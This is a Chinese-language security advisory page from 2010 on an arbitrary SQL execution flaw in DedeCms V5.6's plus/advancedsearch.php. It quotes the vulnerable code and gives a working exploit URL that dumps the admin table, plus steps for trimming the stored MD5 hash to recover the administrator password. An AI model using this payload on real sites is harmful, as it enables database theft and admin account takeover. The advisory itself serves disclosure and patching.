首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
来源:sebug.net 作者:sebug 发布时间:2010-06-17  
影响版本:
DedeCms V5.6 
漏洞描述:
DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。高效率标签缓存机制:允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在模型不能满足用户所有需求的情况下,DedeCMS推出一些互动的模块对系统进行补充,尽量满足用户的需求。

plus/advancedsearch.php
$sql 变量未初始化。导致鸡助漏洞

if($mid == 0)  //必须绕过,By:俺是农村的。
{
        showmsg('参数不正确,高级自定义搜索必须指定模型id', 'javascript');
        exit();
}
$query = "select maintable, mainfields, addontable, addonfields, template from #@__advancedsearch where mid='$mid'";
$searchinfo = $dsql->GetOne($query);
if(!is_array($searchinfo))   //囧啊,绕过有难度,By:俺是农村的。
{
        showmsg('自定义搜索模型不存在','-1');   By:小翔
        exit();
}
$template = $searchinfo['template'] != '' ?  $searchinfo['template'] : 'advancedsearch.htm';
if(empty($sql))         //人品问题,成功绕过! QQ:332876777
{
        ..............
}else{
        $sql = urldecode($sql);
        $query = $sql;
}

$sql = urlencode($sql);
$dlist = new DataListCP();
$dlist->pageSize = 20;
$dlist->SetParameter("sql", $sql);
$dlist->SetParameter("mid", $mid);
...............

$dlist->SetTemplate($templatefile);
$dlist->SetSource($query);

.............
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
SEBUG安全建议:
厂商补丁:
DedeCMS
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.dedecms.com/

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·shopex 4.8.5.45144 \core\inclu
·HDWiki百科程序后台Getshell漏洞
·PHP代码执行漏洞-总结
·百度贴吧吧主密码窃取漏洞
·Php168一个即将被补的代码执行?
·DEDECMS v5.5 GBK Final 的一个
·IIS源码泄露及文件类型解析错误
·nginx文件类型错误解析漏洞
·Discuz! 6.x/7.x 全局变量防御绕
·New Includes Function -- spl_a
·当magic_quotes_gpc=off
·关于magic_quotes_sybase
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved